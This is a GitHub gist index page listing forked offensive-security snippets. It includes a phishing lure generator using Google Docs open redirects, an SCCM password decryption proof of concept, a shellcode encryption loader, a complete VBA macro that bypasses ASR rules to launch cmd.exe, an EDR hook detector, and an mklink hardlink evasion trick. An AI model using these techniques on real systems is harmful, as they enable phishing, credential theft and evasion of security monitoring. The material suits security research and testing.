Skip to content

Instantly share code, notes, and snippets.

View byt3bl33d3r's full-sized avatar
This shit ain't nothing to me man

Marcello byt3bl33d3r

This shit ain't nothing to me man
View GitHub Profile
byt3bl33d3r /
Created December 1, 2022 01:08 — forked from ustayready/
Generate phishing lures that exploit open-redirects from using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
byt3bl33d3r /
Created September 5, 2022 13:02 — forked from gteissier/
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
It has been tested with either py2 or py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.
BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like
byt3bl33d3r / sccmdecryptpoc.cs
Created July 4, 2022 14:45 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
// Twitter thread: (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
internal class Program
byt3bl33d3r /
Created October 17, 2021 09:36 — forked from bontchev/
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

byt3bl33d3r / mainc.c
Created October 2, 2021 21:22 — forked from jackullrich/mainc.c
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
byt3bl33d3r / java-ikvm-dotnet
Created May 31, 2021 19:28 — forked from sixman9/java-ikvm-dotnet
Using IKVM to generate a C# assembly (dll) from a Java jar file
I wanted to use the Flying Saucer Java API in .NET so I tried to use IKVM to convert the Flying Saucer library:
ikvmc core-renderer.jar
For some reason, IKVMC gave me an exe core-renderer.exe so I renamed it to core-renderer.dll, added to my assemblies and hacked away
using java.lang;
using com.lowagie.text;
byt3bl33d3r / ASR Rules Bypass.vba
Created April 9, 2021 07:48 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
byt3bl33d3r /
Created December 31, 2020 10:06 — forked from countercept/
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
import time
import etw
import etw.evntrace
import sys
import argparse
import threading
class RundownDotNetETW(etw.ETW):
def __init__(self, verbose, high_risk_only):
byt3bl33d3r / hookdetector.vba
Created December 8, 2020 17:45 — forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
byt3bl33d3r /
Created September 1, 2020 06:19 — forked from TheWover/
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.